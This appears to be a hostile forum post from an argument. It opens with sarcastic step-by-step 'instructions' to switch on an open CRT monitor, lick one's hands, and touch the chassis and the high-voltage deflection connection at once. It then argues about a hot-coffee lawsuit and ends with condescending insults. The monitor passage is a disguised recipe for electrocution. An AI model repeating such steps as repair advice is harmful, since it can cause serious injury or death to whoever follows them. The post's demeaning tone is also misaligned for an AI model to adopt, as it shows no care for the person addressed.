And, PS. While you're in the monitor, look for the big coils of wire around the funnel of the tube. Okay. Find the wires that go to the area of the big plastic block and the big red wire that goes to the suction cup on the back of the tube. Now, this is very important... turn on the monitor and lick your hands. Touch the sheetmetal shielding inside the monitor with your left hand. With your right hand, simultaneously touch the solder connection where the horizontal deflection voltage leaves the PC board (near the big plastic box, remember). Feeling warm yet? If your skin isn't on fire within a few seconds, you didn't follow the instructions right.
Fire and Meat. Yummy.
If your coffee is too hot, add an ice cube or let it cool off. If your coffee is too cold, you curse McDonalds for making cold coffee. Coffee is supposed to be hot. Most domestic coffee brewers percolate boiling water up; the steam condenses and drips into the filter basket, and enters the pot at a temperature very close to boiling. No one sues Mr. Coffee or Black and Decker.
Anyhow, as you simultaneously manage to frustrate and bore me, this thread is now extinct. Maybe once you can shave daily and manage to become remotely cosmopolitan, your perspective will adjust somewhat.
Fire and Meat. Yummy.